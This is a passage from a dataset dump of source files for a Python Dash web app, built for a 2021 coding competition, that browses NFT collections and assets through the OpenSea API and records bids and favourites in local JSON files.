html.Td(upload_asset['asset_contract']['created_date'])])\n row8 = html.Tr([html.Td(\"asset contract name\"), html.Td(upload_asset['asset_contract']['name'])])\n row9 = html.Tr([html.Td(\"asset contract owner\"), html.Td(upload_asset['asset_contract']['owner'])])\n row10 = html.Tr([html.Td(\"schema_name\"), html.Td(upload_asset['asset_contract']['schema_name'])])\n row11 = html.Tr([html.Td(\"symbol\"), html.Td(upload_asset['asset_contract']['symbol'])])\n row12 = html.Tr([html.Td(\"owner\"), html.Td(upload_asset['owner']['user']['username'])])\n table_body = [html.Tbody([row1, row2, row3, row4, row5, row6, row7, row8, row9, row10, row11, row12])]\n return html.Div([\n html.Img(src=image_url, className=\".w-50\"),\n dbc.Table(table_body, bordered=True)\n ])\n\n\ndef write_json(new_json, name, filename):\n \"\"\"\n Write NFT data as object to json file\n :param new_json: NFT in json format\n :param name: value of name in name_value par list\n :param filename: filename of file its stored in\n \"\"\"\n with open(filename, 'r+') as file:\n file_data = json.load(file) # load data into dict\n file_data[name].append(new_json)\n file.seek(0)\n json.dump(file_data, file, indent=4)\n"
},
{
"alpha_fraction": 0.6127066016197205,
"alphanum_fraction": 0.6341099739074707,
"avg_line_length": 40.943180084228516,
"blob_id": "54d615bab840c6ab013f80f55e75854a2490b5c7",
"content_id": "6d8312bc40b577b561a96d2cccee18542fbd3af7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7384,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 176,
"path": "/apps/nft_collections.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas as pd\nimport dash\nimport dash_bootstrap_components as dbc\nfrom dash.exceptions import PreventUpdate\nfrom dash import html, dcc, Input, Output\nfrom app import app\n\n\ndef generate_img_buttons():\n \"\"\"\n Generate image buttons for each collection\n :return: list of image buttons\n \"\"\"\n # selected collections to display\n slugs = ['dotdotdots', 'bears-deluxe', 'sappy-seals', 'gutterpigeons', 'epiceagles', 'infinity-frogs-nft']\n image_links = ['https://lh3.googleusercontent.com/lIo17HAEF8FwPEJZOD9xg'\n '-SLk9hAcDc0sjiviGY63KR1py7BGd78Xpv_SIPfhCINZq16pF-rlwfTuq68dvuL7uhCU_FPKLnT16oS=s120',\n 'https://lh3.googleusercontent.com'\n '/InPgClcuGiNA5TdEGTu7zuGSv1LDJ54L_sC49G7fqJ0YawDcdmN78t7iShcrbyQ_sdoUyjyBAoXVMTKaaf9OP8ekDyBaEEWJMiDbi8M=s120',\n 'https://lh3.googleusercontent.com'\n '/c_wASW_EH06TmUJTAfZ9HYAx8rhKbu3SbOqpHHp0OistKOTJcPDjhSBg3S6OM3HG9ivBpVVtSnKkNJKilZQCc_8V1kTG7JQDSzmWoQ=s120',\n 'https://lh3.googleusercontent.com/UoABiu1ydkR50jb_G2BPJO1I9dQ30o6DzRY2RCPoo'\n '-etNtb77FRj2WxoxG_sYL6C6I5qiu88g6BpAX6GfIGjuFPcZQ_beA_M8TWpQDM=s120',\n 'https://lh3.googleusercontent.com/BMCuX'\n '-_CakY3bKgjl7mxVgAKKug2D1xdWNcenSeKYReZtIfYGD1Uo0BN7nIeDtRIsgu6Xz8b90AYGCqn8EvKWhaiHJ2-OVu0Oos-NA'\n '=s120',\n 'https://lh3.googleusercontent.com'\n '/5tHPLRm3oJiR0xNSIuBvZthmH2bOC81QC2AE6N6tnV1xBzqV8h2QQDJb6IErqEiUp4CEUlUOvcxjB3NDKAajCocluKd577H1u2LU3es=s120']\n\n btn_list = []\n for (slug, url) in zip(slugs, image_links):\n btn = html.Button(id=f'{slug}', className=\"col-btn\", children=[html.Img(src=f'{url}')])\n btn_list.append(btn)\n return html.Div(btn_list, className=\"collection_buttons\")\n\n\ndef get_collection(offset, limit, slug):\n \"\"\"\n Get assets belonging to a certain collection of NFTs, based on the collection id and pagination\n :param offset: offset for the request, calculated by page number\n :param limit: the number of assets fetched per page\n :param slug: collection slug, identifying property belonging to a specific collection\n :return: a dataframe containing data about each NFT\n \"\"\"\n url = \"https://api.opensea.io/api/v1/assets\"\n querystring = {\"offset\": f\"{offset}\", \"limit\": f\"{limit}\", \"collection\": f\"{slug}\"}\n response = requests.request(\"GET\", url, params=querystring)\n data = response.json()\n df = pd.json_normalize(data['assets'])\n # only need a certain set of columns\n col_list = ['id', 'token_id', 'image_url', 'name', 'asset_contract.address', 'collection.name']\n df = pd.DataFrame(df, columns=col_list)\n return df\n\n\ndef create_card(card_img, card_title, token_id, asset_contract_address):\n \"\"\"\n Create individual cards for an NFT\n :param card_img: the img link\n :param card_title: NFT name\n :param token_id: NFT token_id\n :param asset_contract_address: NFT contract address\n :return: a card containing information about a specific NFT\n \"\"\"\n asset_link = dbc.CardLink(\"{name}\".format(name=card_title),\n href=\"/asset?asset_contract_address={address}&token_id={token_id}\".format(\n address=asset_contract_address, token_id=token_id), className=\"card-link\")\n return dbc.Card(\n [\n dbc.CardImg(src=card_img, top=True),\n dbc.CardBody(\n [\n html.H4(asset_link, className=\"card-title\"),\n ],\n className=\"card-body\",\n ),\n ],\n className=\"card border-secondary col\"\n )\n\n\ndef create_cardgrid(offset, limit, slug):\n \"\"\"\n Creates a grid of cards\n :param offset: offset for request\n :param limit: the amount of NFT to be shown on the page\n :param slug: unique ID for a specific collection\n :return: card grid containing cards\n \"\"\"\n data = get_collection(offset, limit, slug)\n cards = []\n for item in data.index:\n cards.append(create_card(data['image_url'][item], data['name'][item],\n data['token_id'][item], data['asset_contract.address'][item]))\n return data['collection.name'][0], html.Div(cards, className=\"col_card_grid row row-cols-4\")\n\n\ndef create_layout():\n \"\"\"\n Creates the layout for the collections page\n :return: layout with all the elements in\n \"\"\"\n return html.Div(\n [\n dcc.Store(id='slug_memory'), # local storage for collection slug value\n html.Div(\n [\n html.H1('Collections', className=\"text-center mt-3\"),\n html.P('Utforsk noen utvalgte collections. Trykk på bildeknappene for å se samlingene', className=\"text-center\"),\n generate_img_buttons(),\n ],\n className=\"header\",\n ),\n html.Div([\n html.H1(id=\"col_title\", className=\"text-muted\"),\n html.Div(id=\"col_pag\"),\n ], className=\"d-md-flex flex-md-row justify-content-sm-between\"),\n html.Div(id=\"collection_content\"),\n ],\n className=\"main\"\n )\n\n\[email protected](\n Output(\"slug_memory\", \"data\"),\n Output(\"col_pag\", \"children\"),\n [\n Input(\"dotdotdots\", \"n_clicks\"),\n Input(\"bears-deluxe\", \"n_clicks\"),\n Input(\"sappy-seals\", \"n_clicks\"),\n Input(\"gutterpigeons\", \"n_clicks\"),\n Input(\"epiceagles\", \"n_clicks\"),\n Input(\"infinity-frogs-nft\", \"n_clicks\")\n ]\n)\ndef trigger_cardgrid(n_col1, n_col2, n_col3, n_col4, n_col5, n_col6):\n \"\"\"\n Accepts click event from a image button, and prepares for the displaying of the card grid by saving the collection\n slug in the browser and setting up pagination controls\n :param n_col1: img_btn 1 click event\n :param n_col2: img_btn 2 click event\n :param n_col3: img_btn 3 click event\n :param n_col4: img_btn 4 click event\n :param n_col5: img_btn 5 click event\n :param n_col6: img_btn 6 click event\n :return: stores collection slug from image_btn in dcc.Store (localstorage),\n and outputs pagination element to the app layout\n \"\"\"\n ctx = dash.callback_context\n\n if not ctx.triggered:\n raise PreventUpdate\n else:\n button_id = ctx.triggered[0]['prop_id'].split('.')[0] # get btn id for slug\n\n slug = button_id # collection reference\n page_view = dbc.Pagination(max_value=5, first_last=True, active_page=1, id=\"collection_pagination\",\n className=\"pagination\")\n return slug, page_view\n\n\[email protected](Output(\"col_title\", \"children\"),\n Output(\"collection_content\", \"children\"),\n [Input(\"slug_memory\", \"data\"), Input(\"collection_pagination\", \"active_page\")])\ndef display_cardgrid(slug, page_no):\n \"\"\"\n Create the cardgrid view based on slug, and output the cards to the app layout\n :param slug: collection slug used to identify the wanted collection\n :param page_no: current page number from pagination controls\n :return: card grid layout containing cards for all the assets, with pagination in mind\n \"\"\"\n limit = 12\n page_no = page_no\n offset = (page_no * limit) - limit # calculate offset\n return create_cardgrid(offset, limit, slug)\n"
},
{
"alpha_fraction": 0.480361670255661,
"alphanum_fraction": 0.48318734765052795,
"avg_line_length": 33.028846740722656,
"blob_id": "1c8af5dbe268158cb19b32d3b44c928c369e29da",
"content_id": "42bfc3af55645dad80737dab0bed2db8f42caaca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3539,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 104,
"path": "/apps/home.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import dash_bootstrap_components as dbc\nimport requests\nimport pandas as pd\nfrom dash import html\n\n\ndef get_new_auction():\n \"\"\"\n Get 5 newly created auctions to display in carousel\n :return: dataframe with data about NFTs\n \"\"\"\n url = \"https://api.opensea.io/api/v1/events\"\n querystring = {\"event_type\": \"created\", \"only_opensea\": \"true\", \"offset\": \"0\", \"limit\": \"5\"}\n headers = {\"Accept\": \"application/json\"}\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n data = response.json()\n df = pd.json_normalize(data['asset_events'])\n col_list = ['asset.token_id', 'asset.image_url', 'asset.name', 'asset.contract_address']\n df = pd.DataFrame(df, columns=col_list)\n return df\n\n\ndef create_slides(data):\n \"\"\"\n Create slides for carousel and populate them with data from NFTs\n :param data: dataframe containing NFT data\n :return: list of slides for carousel\n \"\"\"\n slides = []\n for item in data.index:\n slides.append({\n \"key\": item,\n \"src\": data['asset.image_url'][item],\n \"header\": data['asset.name'][item],\n })\n return slides\n\n\ndef create_layout():\n \"\"\"\n Creates the layout for the home page\n :return: layout with all the elements in\n \"\"\"\n carousel = dbc.Carousel(\n items=create_slides(get_new_auction()),\n className=\"carousel\"\n )\n\n cards = dbc.CardGroup(\n [\n dbc.Card(\n dbc.CardBody(\n [\n html.H5(\"Explore\", className=\"card-title text-center\"),\n html.P(\n \"Browse thousands of NFTs on our marketplace, and discover different collections\",\n className=\"card-text\",\n ),\n dbc.CardLink(\"marketplace\", href=\"/marketplace\", className=\"card-link\"),\n dbc.CardLink(\"collections\", href=\"/collections\", className=\"card-link\"),\n ]\n )\n ),\n dbc.Card(\n dbc.CardBody(\n [\n html.H5(\"Sell your NFTs\", className=\"card-title text-center\"),\n html.P(\n \"Upload your own NFTs, add metadata and list them for sale\",\n className=\"card-text\",\n ),\n dbc.CardLink(\"upload here\", href=\"/upload\", className=\"card-link\"),\n ]\n )\n ),\n dbc.Card(\n dbc.CardBody(\n [\n html.H5(\"Profile\", className=\"card-title text-center\"),\n html.P('''On your own profile you can keep track on NFTs your have added to your favourites, \n keep track of the NFTs you have placed bids on and view your uploaded assets ''',\n className=\"card-text\",\n ),\n dbc.CardLink(\"go to profile\", href=\"/profile\", className=\"card-link\"),\n ]\n )\n ),\n ],\n className=\"mt-5\",\n )\n\n return html.Div(\n [\n html.Div(\n [\n html.H1('New auctions', className='header-text text-center mt-3'),\n ],\n className=\"header\",\n ),\n carousel,\n cards,\n ],\n className=\"main\"\n )\n"
},
{
"alpha_fraction": 0.5088105797767639,
"alphanum_fraction": 0.5122284889221191,
"avg_line_length": 36.83333206176758,
"blob_id": "8d17561b9fa74330d289c86cc8be1f7b1777e433",
"content_id": "5e12ca9359590b9da5a9dadab10c8e671d9503a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13166,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 348,
"path": "/apps/asset.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas as pd\nimport json\nimport dash_bootstrap_components as dbc\nfrom urllib.parse import urlparse, parse_qsl\nfrom dash import html, dcc, Input, Output, State\nfrom app import app\n\n\ndef get_single_asset(asset_contract_address, token_id):\n \"\"\"\n Get a single asset\n :param asset_contract_address:\n :param token_id:\n :return: dataframe with asset data\n \"\"\"\n url = \"https://api.opensea.io/api/v1/asset/{asset_contract_address}/{token_id}/\".format(\n asset_contract_address=asset_contract_address, token_id=token_id)\n response = requests.request(\"GET\", url)\n data = response.json()\n df = pd.json_normalize(data)\n df = pd.DataFrame(df)\n df_orders = pd.json_normalize(data['orders'])\n pd.set_option('display.max_colwidth', None) # extend colwidth to display whole value, instead of partial values\n return df, df_orders\n\n\ndef get_more_from_collection(collection):\n \"\"\"\n Get 5 similar NFTs from the same collection\n :param collection: colleciton id/slug\n :return: dataframe with data\n \"\"\"\n url = \"https://api.opensea.io/api/v1/assets\"\n querystring = {\"limit\": \"5\", \"collection\": f\"{collection}\"}\n response = requests.request(\"GET\", url, params=querystring)\n data = response.json()\n df = pd.json_normalize(data['assets'])\n col_list = ['id', 'token_id', 'name', 'image_url', 'asset_contract.address']\n df = pd.DataFrame(df, columns=col_list)\n return df\n\n\n# create card with image and button to opensea\ndef create_card(card_img, card_title, token_id, asset_contract_address):\n asset_link = dbc.CardLink(\"{name}\".format(name=card_title),\n href=\"/asset?asset_contract_address={address}&token_id={token_id}\".format(\n address=asset_contract_address, token_id=token_id))\n return dbc.Card(\n [\n dbc.CardImg(src=card_img, top=True),\n dbc.CardBody(\n html.H4(asset_link, className=\"card-title\"),\n className=\"card-body\",\n ),\n ],\n className=\"card border-primary col\"\n )\n\n\ndef gen_traits(asset):\n \"\"\"\n Generate trait grid\n :param asset: asset data\n :return: a trait card for every trait the NFT possesses\n \"\"\"\n if asset[\"traits\"].to_string(index=False) == '[]': # maybe not the prettiest way to check if traits exists\n return html.P(\"This NFT has no traits\")\n else:\n asset_traits = pd.json_normalize(asset['traits']).unstack().apply(pd.Series)\n asset_traits['trait_count'] = round(asset_traits['trait_count'].astype(float)/100)\n trait_cards = []\n for trait in asset_traits.index:\n percent = asset_traits['trait_count'][trait]\n card = dbc.Card(\n dbc.CardBody(\n [\n html.H6(asset_traits['trait_type'][trait], className=\"card-subtitle text-info text-center\"),\n html.H4(asset_traits['value'][trait], className=\"card-title text-center\"),\n html.P(\n f\"{percent}% have this trait\",\n className=\"card-text text-muted text-center\",\n ),\n ],\n className=\"card-body\",\n ),\n className=\"card border-info col\",\n )\n trait_cards.append(card)\n return html.Div(trait_cards, className=\"col_card_grid row row-cols-3\")\n\n\ndef calculate_price(asset_orders):\n \"\"\"\n Convert prices from wei to ETH and usd\n :param asset_orders: asset order details\n :return: html to render currency amount\n \"\"\"\n if 'current_price' in asset_orders.columns:\n current_price = (\n asset_orders['current_price'][0] / pow(10, asset_orders['payment_token_contract.decimals'][0]))\n current_price_usd = (((asset_orders['current_price'][0] / pow(10, asset_orders[\n 'payment_token_contract.decimals'][0])) * asset_orders['payment_token_contract.usd_price'][0]) /\n asset_orders['quantity'][0])\n return dbc.ListGroupItem(\n [\n html.H5('Current price'),\n html.Div([\n html.Img(src='{url}'.format(url=asset_orders['payment_token_contract.image_url'][0]),\n id=\"price_symbol\"),\n html.Small(current_price),\n html.Small(f'(${current_price_usd})'),\n dbc.Tooltip(asset_orders['payment_token_contract.symbol'][0],\n target=\"price_symbol\",\n ),\n ]),\n ],\n )\n else:\n return dbc.ListGroupItem(\n [\n html.H5('Current price'),\n html.Div([\n html.Small(\"No bids yet\"),\n ]),\n ],\n )\n\n\ndef create_layout(url_query):\n # get asset corresponding to the ones the user clicked on earlier\n asset_contract_address = url_query['asset_contract_address']\n token_id = url_query['token_id']\n dcc.Location(id='url', refresh=False),\n asset, asset_orders = get_single_asset(asset_contract_address, token_id)\n if 'current_price' in asset_orders.columns:\n # if current bids exists, convert values to float/int to calculate prices\n asset_orders['current_price'] = asset_orders['current_price'].astype(float)\n asset_orders['payment_token_contract.usd_price'] = asset_orders['payment_token_contract.usd_price'].astype(\n float)\n asset_orders['quantity'] = asset_orders['quantity'].astype(int)\n\n def create_cardgrid():\n data = get_more_from_collection(asset['collection.slug'].to_string(index=False))\n cards = []\n for item in data.index:\n cards.append(create_card(data['image_url'][item], data['name'][item],\n data['token_id'][item],\n data['asset_contract.address'][item]))\n return html.Div(cards, className=\"col_card_grid row row-cols-5\")\n\n bid_window = dbc.Modal(\n [\n dbc.ModalHeader(\"Bid\"),\n dbc.ModalBody([html.P(\"Put in your bid. Decimals are indicated with .\"),\n html.P(f\"You must bid higher than current price\")]),\n dbc.InputGroup(\n [\n dbc.Input(id=\"bid_amount\", placeholder=\"Amount\", type=\"number\"),\n dbc.InputGroupText(\"ETH\"),\n ],\n ),\n html.P(id=\"output_msg_bid\", className=\"text-center\"),\n dbc.ModalFooter([\n dbc.Button(\n \"Confirm\", id=\"confirm_bid\", className=\"ml-auto btn btn-success\", n_clicks=0\n ),\n dbc.Button(\n \"Close\", id=\"close_modal\", className=\"ml-auto\", n_clicks=0,\n )\n ],\n ),\n ],\n id=\"modal\",\n is_open=False,\n )\n\n asset_info = dbc.ListGroup(\n [\n dbc.ListGroupItem(\n html.H5(asset['name']),\n\n ),\n calculate_price(asset_orders),\n dbc.ListGroupItem(\n [\n dbc.Button(\"Place a bid\", id=\"open\", n_clicks=0, className=\"btn btn-primary w-50\"),\n dbc.Button('Save', id='fav_btn', className=\"btn btn-info\"),\n html.P(id=\"output_fav\"),\n ],\n\n ),\n dbc.Tooltip(\n \"You can find a list of your saved assets on your profile\",\n target=\"fav_btn\",\n placement=\"top\",\n ),\n ],\n )\n\n address_link = html.A(\"{name}\".format(name=asset['asset_contract.address'].to_string(index=False)), href='https://etherscan.io/address/{address}'.format(address=asset['asset_contract.address'].to_string(index=False)))\n row1 = html.Tr([html.Td(\"Contract Address\"), address_link])\n row2 = html.Tr([html.Td(\"Token ID\"), html.Td(asset['token_id'])])\n row3 = html.Tr([html.Td(\"Token Standard\"), html.Td(asset['asset_contract.schema_name'])])\n\n table_body = [html.Tbody([row1, row2, row3])]\n\n asset_details = html.Div(\n dbc.Accordion(\n [\n dbc.AccordionItem(\n [\n html.P('Created by ' + asset['creator.user.username'], className=\"text-muted\"),\n html.P(asset['description']),\n ],\n title=\"Description\", className=\"accordion-item\",\n ),\n dbc.AccordionItem(\n [\n html.Img(src=\"{url}\".format(url=asset['collection.image_url'].to_string(index=False))),\n html.P(asset['collection.description']),\n ],\n title=\"About \" + asset['collection.name'], className=\"accordion-item\",\n ),\n dbc.AccordionItem(\n gen_traits(asset),\n title=\"Traits\", className=\"accordion-item\",\n ),\n dbc.AccordionItem(\n table_body,\n title=\"Details\", className=\"accordion-item\",\n ),\n dbc.AccordionItem(\n create_cardgrid(),\n title=\"More from this collection\", className=\"accordion-item\",\n ),\n ],\n flush=True,\n className=\"accordion\",\n )\n )\n\n return html.Div(\n children=[\n dcc.Store(id=\"address_token\"),\n html.Div(\n [\n dbc.Row(\n [\n dbc.Card(\n [\n dbc.CardImg(src='{img_url}'.format(img_url=asset['image_url'][0]), top=True),\n dbc.CardBody(\n dbc.Button(\"Open on opensea\", id=\"opensea_link\", n_clicks=0,\n href='{url}'.format(\n url=asset['permalink'].to_string(index=False)),\n className=\"btn btn-primary\")\n ),\n ],\n style={\"width\": \"18rem\"},\n className=\"card border-light\",\n ),\n dbc.Col(asset_info),\n ]\n ),\n ]\n ),\n\n bid_window,\n asset_details,\n ],\n className=\"main mt-3\"\n )\n\n\n# save contract address and token_id in local storage in browser\[email protected](Output(\"address_token\", \"data\"),\n [Input(\"url\", \"href\")])\ndef display_page(path_href):\n # get query string from url as dictionary\n parse_result = urlparse(path_href)\n params = parse_qsl(parse_result.query)\n state = dict(params)\n return state\n\n\[email protected](\n Output(\"modal\", \"is_open\"),\n [Input(\"open\", \"n_clicks\"),\n Input(\"close_modal\", \"n_clicks\")],\n [State(\"modal\", \"is_open\")]\n)\ndef show_modal(n_bid, n_close, is_open):\n if n_bid or n_close:\n return not is_open\n return is_open\n\n\[email protected](\n Output(\"output_msg_bid\", \"children\"),\n [Input(\"confirm_bid\", \"n_clicks\"),\n Input('address_token', 'data')],\n [State(\"bid_amount\", \"value\")]\n)\ndef accept_bid(n_confirm, asset, n_amount):\n if n_confirm:\n bid_asset = {\n \"asset_contract_address\": \"{address}\".format(address=asset['asset_contract_address']),\n \"token_id\": \"{id}\".format(id=asset['token_id']),\n \"price\": \"{price}\".format(price=n_amount)\n }\n add = write_json(bid_asset, 'bids', 'bids.json')\n if add:\n return f\"Bid of {n_amount} ETH accepted!\"\n else:\n return \"Cannot accept a new bid directly after your own\"\n\n\[email protected](\n Output(\"output_fav\", \"children\"),\n [Input(\"fav_btn\", \"n_clicks\"),\n Input('address_token', 'data')]\n)\ndef add_favourite(n_fav, asset):\n if n_fav:\n fav_asset = {\n \"asset_contract_address\": \"{address}\".format(address=asset['asset_contract_address']),\n \"token_id\": \"{id}\".format(id=asset['token_id']),\n }\n write_json(fav_asset, 'favourites', 'favourites.json')\n\n\ndef write_json(new_json, name, filename):\n with open(filename, 'r+') as file:\n file_data = json.load(file) # load data into dict\n add = True\n for x in file_data[name]:\n if (new_json['asset_contract_address'] == x['asset_contract_address'] and new_json['token_id'] == x['token_id']):\n add = False\n if add:\n file_data[name].append(new_json)\n file.seek(0)\n json.dump(file_data, file, indent=4)\n print('yay')\n return True\n else:\n print('error error error')\n return False\n"
},
{
"alpha_fraction": 0.6312010288238525,
"alphanum_fraction": 0.6325065493583679,
"avg_line_length": 26.35714340209961,
"blob_id": "d0f7ec318c441eb283832211576c61556012c7a9",
"content_id": "c7f8e1b299cd1bfe8bc3c119653a8417ec993d5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1532,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 56,
"path": "/index.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import dash\nfrom dash import html\nfrom dash import dcc\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State\nfrom urllib.parse import urlparse, parse_qsl, urlencode\nfrom app import app\nfrom app import server\nfrom apps import (\n home,\n marketplace,\n nft_collections,\n asset,\n events,\n profile,\n upload\n)\n\nfrom navbar import Navbar\n\napp.layout = html.Div(\n children=[\n dcc.Location(id=\"url\", refresh=False),\n Navbar(),\n html.Div(\n id=\"main-content\", className=\"mx-sm-5 mb-5\"\n )\n ])\n\n\n# Update page when navbar is used\[email protected](Output(\"main-content\", \"children\"),\n [Input(\"url\", \"pathname\"), Input(\"url\", \"href\")])\ndef display_page(path_name, path_href):\n if path_name == \"/marketplace\":\n return marketplace.create_layout()\n elif path_name == \"/collections\":\n return nft_collections.create_layout()\n elif path_name.startswith(\"/asset\"):\n # get query string from url as dictionary\n parse_result = urlparse(path_href)\n params = parse_qsl(parse_result.query)\n state = dict(params)\n return asset.create_layout(state)\n elif path_name == \"/events\":\n return events.create_layout()\n elif path_name == \"/profile\":\n return profile.create_layout()\n elif path_name == \"/upload\":\n return upload.create_layout()\n elif path_name == \"/home\":\n return home.create_layout()\n\n\nif __name__ == '__main__':\n app.run_server(debug=False)\n"
},
{
"alpha_fraction": 0.7248157262802124,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 30.30769157409668,
"blob_id": "0c29d37cc59658cf63f02d4fe0e7344951b1f4b9",
"content_id": "dcdef306659dd6e0503317258355c30294461a6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 407,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 13,
"path": "/app.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import dash\nimport dash_bootstrap_components as dbc\n\n# bootstrap theme imported from\n# https://bootswatch.com/lux\nexternal_stylesheets = [dbc.themes.LUX]\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets, meta_tags=[\n {\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=1\"}\n ])\napp.title = 'NFT'\nserver = app.server\napp.config.suppress_callback_exceptions = True\n"
},
{
"alpha_fraction": 0.5603305697441101,
"alphanum_fraction": 0.5603305697441101,
"avg_line_length": 29.25,
"blob_id": "36d646a0cec9e77a92552c1c01a6d7d8fef7453d",
"content_id": "c650d66ee3617062d5c16dc7d823917e96096e85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 605,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/navbar.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import dash_bootstrap_components as dbc\n\n\ndef Navbar():\n navbar = dbc.NavbarSimple(\n children=[\n dbc.NavItem(dbc.NavLink(\"Marketplace\", href=\"/marketplace\")),\n dbc.NavItem(dbc.NavLink(\"Collections\", href=\"/collections\")),\n dbc.NavItem(dbc.NavLink(\"Activity\", href=\"/events\")),\n dbc.NavItem(dbc.NavLink(\"Upload NFT\", href=\"/upload\")),\n dbc.NavItem(dbc.NavLink(\"Profile\", href=\"/profile\")),\n\n ],\n brand=\"Home\",\n brand_href=\"/home\",\n sticky=\"top\",\n className=\"\",\n expand=\"md\",\n )\n return navbar\n"
},
{
"alpha_fraction": 0.544739305973053,
"alphanum_fraction": 0.5483397841453552,
"avg_line_length": 34.8803825378418,
"blob_id": "c981b92ae37788f65bbe1c59690d408444ffbe7e",
"content_id": "17d3fdeffcf6adf4ab7deaba04f1ace8f4a1a613",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7499,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 209,
"path": "/apps/marketplace.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas as pd\nimport dash_bootstrap_components as dbc\nfrom dash import html, Input, Output\nfrom app import app\n\n\n# convert snake case variables to readable text with capitalized letter\ndef convert_snake(snake_case):\n return snake_case.replace(\"_\", \" \").title()\n\n\ndef convert_slugs(snake_case):\n return snake_case.replace(\"-\", \" \").title()\n\n\ndef convert_price(price):\n \"\"\"\n Convert currency value from WEI to ETH if its not nan\n :param price: amount in WEI\n :return: amount in ETH\n \"\"\"\n if pd.isna(price):\n return price\n else:\n return f\"{(price / pow(10, 18))} ETH\"\n\n\ndef get_collection_slug():\n \"\"\"\n Get a set of 300 slugs to display in the collections dropdownlist\n :return: list of 300 unique slugs\n \"\"\"\n url = \"https://api.opensea.io/api/v1/collections?offset=0&limit=300\"\n response = requests.request(\"GET\", url)\n data = response.json()\n df = pd.json_normalize(data['collections'])\n df = pd.DataFrame(df)\n collection = df['slug'].tolist()\n return collection\n\n\ndef get_assets(order_by, order_direction, offset, limit, collection):\n \"\"\"\n Get assets to display on page\n :param order_by: how to order the assets\n :param order_direction: asc/desc direction\n :param offset: offset for request\n :param limit: how many assets are shown on the page\n :param collection: unique slug that gets assets belonging to that collection\n :return: dataframe containing data about all assets fetched\n \"\"\"\n url = \"https://api.opensea.io/api/v1/assets\"\n querystring = {\"order_by\": f\"{order_by}\", \"order_direction\": f\"{order_direction}\", \"offset\": f\"{offset}\",\n \"limit\": f\"{limit}\", \"collection\": f\"{collection}\"}\n response = requests.request(\"GET\", url, params=querystring)\n data = response.json()\n df = pd.json_normalize(data['assets'])\n col_list = ['id', 'token_id', 'name', 'image_url', 'collection.name', 'last_sale.total_price',\n 'asset_contract.address']\n df = pd.DataFrame(df, columns=col_list)\n # convert price from last sale to float, so i can do math\n df['last_sale.total_price'] = df['last_sale.total_price'].astype(float)\n df['last_sale.total_price'] = df['last_sale.total_price'].apply(convert_price)\n return df\n\n\ndef create_card(card_img, card_collection, card_title, card_price, token_id, asset_contract_address):\n \"\"\"\n Create a card with data about a specific NFT\n :param card_img: image link\n :param card_collection: collection name\n :param card_title: name of NFT\n :param card_price: price from last sale in ETH\n :param token_id: token id for NFT\n :param asset_contract_address: contract address for NFT\n :return: html with data for an asset\n \"\"\"\n asset_link = dbc.CardLink(\"{name}\".format(name=card_title),\n href=\"/asset?asset_contract_address={address}&token_id={token_id}\".format(\n address=asset_contract_address, token_id=token_id))\n return dbc.Card(\n [\n dbc.CardImg(src=card_img, top=True),\n dbc.CardBody(\n [\n html.H4(asset_link, className=\"card-title\"),\n html.P(card_collection, className=\"card-text\"),\n html.P(card_price, className=\"card-text\"),\n ],\n className=\"card-body\",\n ),\n ],\n className=\"card border-secondary col\"\n )\n\n\ndef create_cardgrid(data):\n \"\"\"\n Create cardgrid with a card for each asset\n :param data: dataframe containing asset data\n :return: html grid containing all the individual cards\n \"\"\"\n cards = []\n for item in data.index:\n cards.append(create_card(data['image_url'][item], data['name'][item], data['collection.name'][item],\n data['last_sale.total_price'][item], data['token_id'][item],\n data['asset_contract.address'][item]))\n return html.Div(cards, className=\"col_card_grid row row-cols-5\")\n\n\ndef create_layout():\n collections = get_collection_slug()\n # sale_price param does not work on query - status 500 internal service error\n order_by_list = ['pk', 'sale_date', 'sale_count'] # order choices\n\n # create filter controls\n controls = [\n html.Div(\n [\n dbc.Label(\"Collection\", className=\"form-label\"),\n dbc.Select(\n id=\"collection-input\",\n className=\"form-select\",\n options=[{'label': 'Select all', 'value': ''}] +\n [{\"label\": convert_slugs(c), \"value\": c}\n for c in collections],\n value='', # set select all to default value\n ),\n ],\n className=\"form-group\",\n ),\n html.Div(\n [\n dbc.Label(\"Sort by\", className=\"form-label\"),\n dbc.Select(\n id=\"order-by-input\",\n className=\"form-select\",\n value=order_by_list[0],\n options=[\n {\"label\": convert_snake(o), \"value\": o}\n for o in order_by_list\n ],\n ),\n ],\n className=\"form-group\",\n ),\n html.Div(\n [\n dbc.Label(\"Order\", className=\"form-check-label\"),\n dbc.RadioItems(\n options=[\n {\"label\": \"desc\", \"value\": \"desc\"},\n {\"label\": \"asc\", \"value\": \"asc\"},\n 